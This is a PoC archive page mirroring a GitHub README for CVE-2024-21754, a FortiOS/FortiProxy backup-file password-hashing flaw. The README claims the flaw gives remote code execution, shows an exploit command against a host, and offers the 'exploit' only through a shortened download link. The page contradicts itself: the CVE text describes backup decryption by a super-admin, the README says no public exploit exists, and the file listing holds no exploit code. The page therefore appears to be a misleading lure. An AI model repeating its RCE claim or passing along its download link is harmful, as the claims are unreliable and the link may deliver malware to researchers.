Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-21754 PoC — Fortinet FortiOS和Fortinet FortiProxy 安全漏洞

Source
https://github.com/llussiess/CVE-2024-21754
Associated Vulnerability
Title:Fortinet FortiOS和Fortinet FortiProxy 安全漏洞 (CVE-2024-21754)
Description:A use of password hash with insufficient computational effort vulnerability [CWE-916] affecting FortiOS version 7.4.3 and below, 7.2 all versions, 7.0 all versions, 6.4 all versions and FortiProxy version 7.4.2 and below, 7.2 all versions, 7.0 all versions, 2.0 all versions may allow a privileged attacker with super-admin profile and CLI access to decrypting the backup file.
Readme
# FortiOS and FortiProxy Password Hashing Vulnerability to RCE (CVE-2024-21754)

## Overview

A critical vulnerability, classified as CVE-2024-21754, has been identified in FortiOS and FortiProxy versions up to 7.4.3, 7.2, 7.0, 6.4, and 2.0. This vulnerability, categorized under CWE-916, involves the use of password hashes with insufficient computational effort, potentially allowing a privileged attacker with super-admin profile and CLI access to decrypt backup files.

## Details

- **CVE ID**: [CVE-2024-21754](https://nvd.nist.gov/vuln/detail/CVE-2024-21754)
- **Discovered**: 2024-04-27
- **Published**: 2024-06-27
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

The vulnerability lies in the password hashing mechanism employed by FortiOS and FortiProxy. The hashing algorithm used in vulnerable versions provides insufficient computational effort, making it susceptible to brute force attacks. An attacker with super-admin privileges and CLI access can exploit this weakness to potentially decrypt backup files containing sensitive information.

## Affected Versions

**FortiOS:**

- 7.4.3 and below
- 7.2 all versions
- 7.0 all versions
- 6.4 all versions

**FortiProxy:**

- 7.4.2 and below
- 7.2 all versions
- 7.0 all versions
- 2.0 all versions


## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```



## Exploit:
### [Download here](https://bit.ly/3G7Ec3d)


![image](https://github.com/llussiess/CVE-2024-21754/blob/main/343915453-a5d4245a-f363-4eb2-a829-0316ab4e0d9d.png)
![image](https://github.com/llussiess/CVE-2024-21754/blob/main/343915562-88f234d8-9dc4-42cc-8b35-02a333ed2a7c.png)
File Snapshot

 [4.0K]  /data/pocs/2e8fd179bea9b7ea2b98a07ba21d26ea8b2baaef
├── [177K]  343915453-a5d4245a-f363-4eb2-a829-0316ab4e0d9d.png
├── [436K]  343915562-88f234d8-9dc4-42cc-8b35-02a333ed2a7c.png
└── [1.7K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →